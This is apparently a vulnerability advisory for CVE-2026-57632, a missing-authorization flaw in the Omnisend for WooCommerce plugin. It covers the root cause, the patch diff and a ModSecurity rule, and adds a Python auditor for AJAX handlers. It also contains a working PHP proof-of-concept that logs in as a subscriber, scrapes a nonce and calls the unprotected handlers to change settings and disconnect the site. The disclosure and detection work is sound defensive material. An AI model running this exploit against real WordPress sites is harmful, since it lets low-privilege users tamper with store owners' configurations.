Published: June 29, 2026

CVE-2026-57632: Email Marketing for WooCommerce by Omnisend <= 1.19.0 Missing Authorization PoC, Patch Analysis & Rule

Severity: Medium (CVSS 4.3)
CWE: CWE-862 (Missing Authorization)
Vulnerable Version: 1.19.0 and earlier
Patched Version: 1.19.1
Disclosed: June 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-57632: this is a missing authorization vulnerability (CWE-862) in the Omnisend for WooCommerce plugin, versions up to and including 1.19.0. It affects three AJAX handler functions and one script-enqueuing function and carries a CVSS score of 4.3 (Medium).

The root cause is the absence of capability checks in three AJAX callbacks: `omnisend_update_plugin_setting`, `omnisend_disconnect_current_site`, and `omnisend_toggle_logging`, all in `/omnisend-connect/class-omnisend-ajax.php`. Each function only performed a nonce check (`check_ajax_referer`) and never verified the caller's capabilities. A WordPress nonce proves that the request came from a page WordPress rendered for the same logged-in user; it says nothing about whether that user is allowed to perform the action, so a nonce check on its own is CSRF protection, not authorization. The nonce actions involved (`omnisend-settings-script-nonce` for the first two handlers, `omnisend_logs` for the third) were obtainable by any authenticated user, including subscribers. Additionally, the admin enqueue callback `omnisend_admin_scripts_and_styles` in `omnisend-woocommerce.php` lacked a capability check, so the settings-page asset loading ran for any authenticated user; this is the likely route by which a low-privilege user obtains a nonce for their own session, and it is why the patch gates that function as well.

Exploitation is straightforward. An authenticated attacker with subscriber-level access sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to one of the unprotected hooks. For example, `action=omnisend_update_plugin_setting` with `setting_name` and `setting_value` parameters modifies plugin settings without authorization. The request must carry a valid nonce, passed as `_ajax_nonce` or `_wpnonce` (`check_ajax_referer` accepts either). WordPress nonces are bound to the user ID and session token, so an attacker cannot reuse an administrator's nonce; what made this exploitable is that the plugin handed a nonce to the attacker's own session. Note that `omnisend_toggle_logging` verifies the separate `omnisend_logs` nonce action, so a nonce minted for the settings script does not pass that handler's check.

The patch adds `current_user_can( 'manage_options' )` checks before any sensitive action is executed; when the check fails the handler responds with HTTP 403 and the JSON error body `{"success":false,"data":"Unauthorized"}`. The changes are minimal: three capability checks in `class-omnisend-ajax.php` (lines 44-47, 89-92, 108-111) and an early return in `omnisend_admin_scripts_and_styles` in `omnisend-woocommerce.php` (lines 157-159). The plugin version is bumped from 1.19.0 to 1.19.1.

If exploited, an attacker with subscriber-level access can modify any Omnisend plugin setting, disconnect the current site from Omnisend's service, or toggle debug logging. This can disrupt email marketing operations, cause data loss by severing the integration, or leak sensitive information through enabled debug logs.

Proof of Concept

The PoC below is the page's PHP script, reconstructed from the extraction. The opening `<?php` block with the target configuration and the first lines of `login_and_get_nonce()` were lost; the variable and function names are taken from their later uses, and the site URL and credentials are read from the command line instead of a configuration block. The script logs in as a low-privilege user, tries to scrape a nonce from the admin HTML, and then calls the two handlers that share the settings nonce.

```php
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-57632 - Missing Authorization in Omnisend for WooCommerce
//
// Usage: php poc.php <site-url> <username> <password>
// The original configuration block did not survive extraction of this page,
// so the site URL and the low-privilege (e.g. subscriber) credentials are
// taken from the command line.
if ($argc < 4) {
    die("Usage: php " . $argv[0] . " <site-url> <username> <password>\n");
}
$target_url = rtrim($argv[1], '/');
$username   = $argv[2];
$password   = $argv[3];

// Step 1: Log in as the low-privilege user and scrape a nonce from the admin HTML
function login_and_get_nonce($url, $user, $pass) {
    $ch = curl_init();
    $login_url  = $url . '/wp-login.php';
    $login_data = array(
        'log'         => $user,
        'pwd'         => $pass,
        'wp-submit'   => 'Log In',
        'redirect_to' => $url . '/wp-admin/',
        'testcookie'  => '1'
    );

    curl_setopt_array($ch, array(
        CURLOPT_URL            => $login_url,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($login_data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR      => '/tmp/cookies.txt',
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,   // lab targets only
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ));

    $response = curl_exec($ch);
    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) != 200) {
        die("Login failed. HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE));
    }
    curl_close($ch);
    // wp-login.php answers a wrong password with HTTP 200 as well, so also
    // require that a wordpress_logged_in_* cookie landed in the jar.
    if (strpos((string) file_get_contents('/tmp/cookies.txt'), 'wordpress_logged_in') === false) {
        die("Login failed: no wordpress_logged_in cookie received.\n");
    }

    // Get the settings page to extract nonce
    $ch = curl_init();
    $settings_url = $url . '/wp-admin/admin.php?page=omnisend';
    curl_setopt_array($ch, array(
        CURLOPT_URL            => $settings_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR      => '/tmp/cookies.txt',
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ));

    $response = curl_exec($ch);
    // The original script expects the nonce as a value="..." attribute following
    // the string wp_ajax_nonce; if nothing is captured, adjust the pattern to
    // match how the plugin actually emits it (for example a localized JS object).
    preg_match('/wp_ajax_nonce.*?value="([^"]+)"/', $response, $matches);
    $nonce = isset($matches[1]) ? $matches[1] : '';
    curl_close($ch);

    return $nonce;
}

// Step 2: Exploit the missing authorization to update plugin settings
function exploit_update_setting($url, $nonce) {
    $ch = curl_init();

    $ajax_url  = $url . '/wp-admin/admin-ajax.php';
    $post_data = array(
        'action'        => 'omnisend_update_plugin_setting',
        '_ajax_nonce'   => $nonce,
        'setting_name'  => 'omnisend_test_setting',
        'setting_value' => 'exploited_value'
    );

    curl_setopt_array($ch, array(
        CURLOPT_URL            => $ajax_url,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($post_data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR      => '/tmp/cookies.txt',
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ));

    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "[+] Attempted to update plugin setting\n";
    echo "[+] HTTP Response Code: $http_code\n";
    echo "[+] Response: $response\n";

    return $response;
}

// Step 3: Also try to disconnect the site (another vulnerable endpoint)
function exploit_disconnect_site($url, $nonce) {
    $ch = curl_init();

    $ajax_url  = $url . '/wp-admin/admin-ajax.php';
    $post_data = array(
        'action'      => 'omnisend_disconnect_current_site',
        '_ajax_nonce' => $nonce
    );

    curl_setopt_array($ch, array(
        CURLOPT_URL            => $ajax_url,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($post_data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR      => '/tmp/cookies.txt',
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ));

    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "[+] Attempted to disconnect Omnisend site\n";
    echo "[+] HTTP Response Code: $http_code\n";
    echo "[+] Response: $response\n";

    return $response;
}

// Main execution
echo "[+] CVE-2026-57632 Proof of Concept\n";
echo "[+] Target: $target_url\n";
echo "[+] Obtaining nonce...\n";

$nonce = login_and_get_nonce($target_url, $username, $password);
if (empty($nonce)) {
    die("[-] Failed to obtain nonce. Check credentials or URL.\n");
}
echo "[+] Nonce obtained: $nonce\n";

echo "[+] Exploiting vulnerability...\n";
exploit_update_setting($target_url, $nonce);
echo "\n";
exploit_disconnect_site($target_url, $nonce);

echo "[+] Exploitation complete.\n";
```

On a patched 1.19.1 site both AJAX calls return HTTP 403 with `{"success":false,"data":"Unauthorized"}`; a 403 with the bare body `-1` means the nonce was rejected (wrong or stale nonce, not a capability check), and any 2xx means the handler body ran for the low-privilege account.

ModSecurity Rule

The page's rule, tidied. The original matched `REQUEST_URI` with `@streq`, which misses subdirectory installs and any request carrying a query string; it read the action only from `ARGS_POST`, although `admin-ajax.php` dispatches on `$_REQUEST['action']` and so accepts it in the query string too; and it chained on the presence of `_ajax_nonce`, which an attacker sidesteps by sending the nonce as `_wpnonce` instead (both are accepted by `check_ajax_referer`). The version below drops the nonce condition (a request without a valid nonce is rejected by WordPress anyway) and matches on the script name and the action wherever it appears.

```apache
# Atomic Edge WAF Rule - CVE-2026-57632
# Blocks the three Omnisend AJAX actions that shipped without a capability check
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:202657632,phase:2,deny,status:403,chain,msg:'CVE-2026-57632 Omnisend missing authorization AJAX',severity:'CRITICAL',tag:'CVE-2026-57632'"
    SecRule ARGS:action "@rx ^omnisend_(update_plugin_setting|disconnect_current_site|toggle_logging)$" "t:none"
```

The WAF cannot see WordPress capabilities, so this rule also blocks administrators who legitimately use the settings page; treat it as a stopgap until 1.19.1 is deployed and expect alerts from admin activity while it is active.
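One way to find this class of bug before it is reported, as an added example that is not code from Atomic Edge or the Omnisend plugin: a small static audit that walks a plugin's `add_action( 'wp_ajax_...', '...' )` registrations and flags callbacks that call `check_ajax_referer` but never `current_user_can`, the exact shape of the three handlers discussed above. The PHP it runs over is constructed to mirror the shapes in the diff; the `add_action` registrations and the `example_public_handler` hook are assumptions, since the page does not show the plugin's registration code.

```python
"""Static check for the CWE-862 shape behind CVE-2026-57632: a wp_ajax_*
handler that verifies a nonce but never checks a capability.

Added example; not code from Atomic Edge or the Omnisend plugin.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# add_action( 'wp_ajax_<action>', '<callback>' ) and the _nopriv_ variant.
HOOK_RE = re.compile(
    r"""add_action\(\s*['"](?P<hook>wp_ajax(?:_nopriv)?_\w+)['"]\s*,\s*['"](?P<cb>\w+)['"]"""
)
NONCE_CALLS = ("check_ajax_referer(", "wp_verify_nonce(", "check_admin_referer(")
CAP_CALLS = ("current_user_can(", "current_user_can_for_blog(", "is_super_admin(")


@dataclass(frozen=True)
class Finding:
    hook: str
    callback: str
    # missing_authorization | missing_nonce | missing_both | ok |
    # public_endpoint | callback_not_found
    verdict: str


def function_body(src: str, name: str) -> str | None:
    """Body of `function name(...) { ... }`, found by naive brace matching.
    Braces inside PHP strings or comments are not understood; good enough for
    a first audit pass, not for adversarial input."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1] if depth == 0 else None


def audit_ajax_handlers(src: str) -> list[Finding]:
    """Classify every registered AJAX callback in one PHP source string."""
    findings = []
    for m in HOOK_RE.finditer(src):
        hook, cb = m.group("hook"), m.group("cb")
        body = function_body(src, cb)
        if body is None:
            findings.append(Finding(hook, cb, "callback_not_found"))
            continue
        has_nonce = any(call in body for call in NONCE_CALLS)
        has_cap = any(call in body for call in CAP_CALLS)
        if hook.startswith("wp_ajax_nopriv_"):
            verdict = "public_endpoint"        # reachable unauthenticated by design
        elif not has_cap and not has_nonce:
            verdict = "missing_both"
        elif not has_cap:
            verdict = "missing_authorization"  # CSRF token checked, authorization absent
        elif not has_nonce:
            verdict = "missing_nonce"          # authorized users can still be CSRF'd
        else:
            verdict = "ok"
        findings.append(Finding(hook, cb, verdict))
    return findings


# Constructed sample modelled on the pre-patch handlers in the diff; the
# add_action() lines and example_public_handler are assumed, not from the plugin.
SAMPLE_PLUGIN_SRC = r"""<?php
add_action( 'wp_ajax_omnisend_update_plugin_setting', 'omnisend_update_plugin_setting' );
add_action( 'wp_ajax_omnisend_disconnect_current_site', 'omnisend_disconnect_current_site' );
add_action( 'wp_ajax_omnisend_toggle_logging', 'omnisend_toggle_logging' );
add_action( 'wp_ajax_nopriv_example_public_handler', 'example_public_handler' );

function omnisend_update_plugin_setting() {
	check_ajax_referer( 'omnisend-settings-script-nonce' );
	Omnisend_Logger::hook();
	$setting_name = isset( $_POST['setting_name'] ) ? sanitize_text_field( wp_unslash( $_POST['setting_name'] ) ) : '';
	// ... the setting is written here in the real plugin
}

// 1.19.1 shape: nonce first, then capability.
function omnisend_disconnect_current_site() {
	check_ajax_referer( 'omnisend-settings-script-nonce' );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'Unauthorized', 403 );
	}
	Omnisend_Logger::hook();
	$result = Omnisend_Disconnect_Service::disconnect_current_site();
}

function omnisend_toggle_logging() {
	check_ajax_referer( 'omnisend_logs' );
	Omnisend_Logger::hook();
	$enable = isset( $_POST['enable'] ) ? sanitize_text_field( wp_unslash( $_POST['enable'] ) ) : '0';
}

function example_public_handler() {
	wp_send_json_success();
}
"""

if __name__ == "__main__":
    for f in audit_ajax_handlers(SAMPLE_PLUGIN_SRC):
        print(f"{f.verdict:<22} {f.hook} -> {f.callback}()")
```

To run it over the real file, pass `open('class-omnisend-ajax.php').read()` to `audit_ajax_handlers`. The callback lookup only resolves string callbacks defined in the same source, so array callbacks such as `array( $this, 'method' )` and closures come back as `callback_not_found` and need a manual look; a `missing_authorization` verdict is a lead to confirm by reading the handler, not a proof on its own, since the capability check may live in a helper the handler calls.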

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/omnisend-connect/class-omnisend-ajax.php
+++ b/omnisend-connect/class-omnisend-ajax.php
@@ -41,6 +41,10 @@
 function omnisend_update_plugin_setting() {
 	check_ajax_referer( 'omnisend-settings-script-nonce' );

+	if ( ! current_user_can( 'manage_options' ) ) {
+		wp_send_json_error( 'Unauthorized', 403 );
+	}
+
 	Omnisend_Logger::hook();
 	$setting_name  = isset( $_POST['setting_name'] ) ? sanitize_text_field( wp_unslash( $_POST['setting_name'] ) ) : '';
 	$setting_value = isset( $_POST['setting_value'] ) ? sanitize_text_field( wp_unslash( $_POST['setting_value'] ) ) : '';
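Review bot: the same four-line `current_user_can( 'manage_options' )` block is pasted into three handlers in this file; a single guard helper that runs `check_ajax_referer` and the capability check together, called first in every `wp_ajax_` callback, would make it harder for the next handler to ship with the nonce check but without the authorization check, which is exactly how these three slipped through.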
@@ -82,6 +86,10 @@
 function omnisend_disconnect_current_site() {
 	check_ajax_referer( 'omnisend-settings-script-nonce' );

+	if ( ! current_user_can( 'manage_options' ) ) {
+		wp_send_json_error( 'Unauthorized', 403 );
+	}
+
 	Omnisend_Logger::hook();
 	$result = Omnisend_Disconnect_Service::disconnect_current_site();

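Review bot: with the guard placed before `Omnisend_Logger::hook()`, a rejected disconnect attempt leaves no trace in the plugin's own log; since disconnecting the site is the most destructive of the three actions, consider recording the denied call (user ID and action) before `wp_send_json_error( 'Unauthorized', 403 )` so that probing by low-privilege accounts is visible to the site owner.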
@@ -97,6 +105,10 @@
 function omnisend_toggle_logging() {
 	check_ajax_referer( 'omnisend_logs' );

+	if ( ! current_user_can( 'manage_options' ) ) {
+		wp_send_json_error( 'Unauthorized', 403 );
+	}
+
 	Omnisend_Logger::hook();
 	$enable = isset( $_POST['enable'] ) ? sanitize_text_field( wp_unslash( $_POST['enable'] ) ) : '0';

--- a/omnisend-connect/omnisend-woocommerce.php
+++ b/omnisend-connect/omnisend-woocommerce.php
@@ -3,7 +3,7 @@
  * Plugin Name: Omnisend for WooCommerce
  * Plugin URI: https://www.omnisend.com
  * Description: 150,000+ ecommerce stores use Omnisend to sell more stuff to more people. Send newsletters & SMS and build email lists with popups.
- * Version: 1.19.0
+ * Version: 1.19.1
  * Author: Omnisend
  * Author URI: https://www.omnisend.com
  * Developer: Omnisend
@@ -154,6 +154,10 @@
 /*Include scripts and styles for settings page and get started notice*/
 add_action( 'admin_enqueue_scripts', 'omnisend_admin_scripts_and_styles' );
 function omnisend_admin_scripts_and_styles() {
+	if ( ! current_user_can( 'manage_options' ) ) {
+		return;
+	}
+
 	// Nonce verification is not required here.
 	// phpcs:disable WordPress.Security.NonceVerification
 	if ( isset( $_GET['page'] ) && $_GET['page'] === OMNISEND_SETTINGS_PAGE ) {
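Review bot: the new guard keeps non-admins out of the enqueue logic, but the callback still decides whether it is on the settings page by reading `$_GET['page']`, which any admin screen URL can carry. `admin_enqueue_scripts` passes the current `$hook_suffix` as its first argument; comparing that against the hook returned when the menu page was registered would tie the assets (and whatever is localized with them) to the actual settings screen rather than to a query-string value, and would remove the need for the phpcs nonce-verification suppression that follows.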
